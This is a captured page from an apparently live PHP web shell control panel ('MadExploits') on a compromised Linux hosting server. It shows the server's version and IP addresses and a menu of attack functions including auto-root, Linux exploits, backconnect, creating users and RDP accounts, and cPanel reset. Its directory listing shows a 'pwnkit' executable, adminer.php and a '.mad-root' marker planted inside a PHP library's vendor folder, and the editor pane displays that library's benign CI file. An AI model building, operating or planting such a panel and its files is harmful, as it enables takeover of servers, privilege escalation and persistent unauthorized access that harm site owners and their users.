Linux server-604606.appsiete.com 3.10.0-1160.139.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Nov 3 13:30:41 UTC 2025 x86_64
Apache
: 162.240.172.200 | : 216.73.216.32
14 Domain
7.3.33
gujo45me
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
gujo45me /
.trash /
vendor /
myclabs /
deep-copy /
[ HOME SHELL ]
Name
Size
Permission
Action
doc
[ DIR ]
drwxr-xr-x
fixtures
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
.gitattributes
136
B
-rw-r--r--
.gitignore
40
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
.travis.yml
762
B
-rw-r--r--
LICENSE
1.05
KB
-rw-r--r--
README.md
9.45
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
composer.json
784
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .travis.yml
language: php sudo: false php: - '5.6' - '7.0' - '7.1' - nightly matrix: fast_finish: true include: - php: '5.6' env: COMPOSER_FLAGS="--prefer-lowest" allow_failures: - php: nightly cache: directories: - $HOME/.composer/cache/files before_install: - | if [ "$TRAVIS_PHP_VERSION" = "nightly" ]; then COMPOSER_FLAGS="$COMPOSER_FLAGS --ignore-platform-reqs" fi; install: - composer update --no-interaction --no-progress --no-suggest --prefer-dist $COMPOSER_FLAGS - wget https://github.com/satooshi/php-coveralls/releases/download/v1.0.0/coveralls.phar before_script: - mkdir -p build/logs script: - vendor/bin/phpunit --coverage-clover build/logs/clover.xml after_script: - php coveralls.phar -v
Close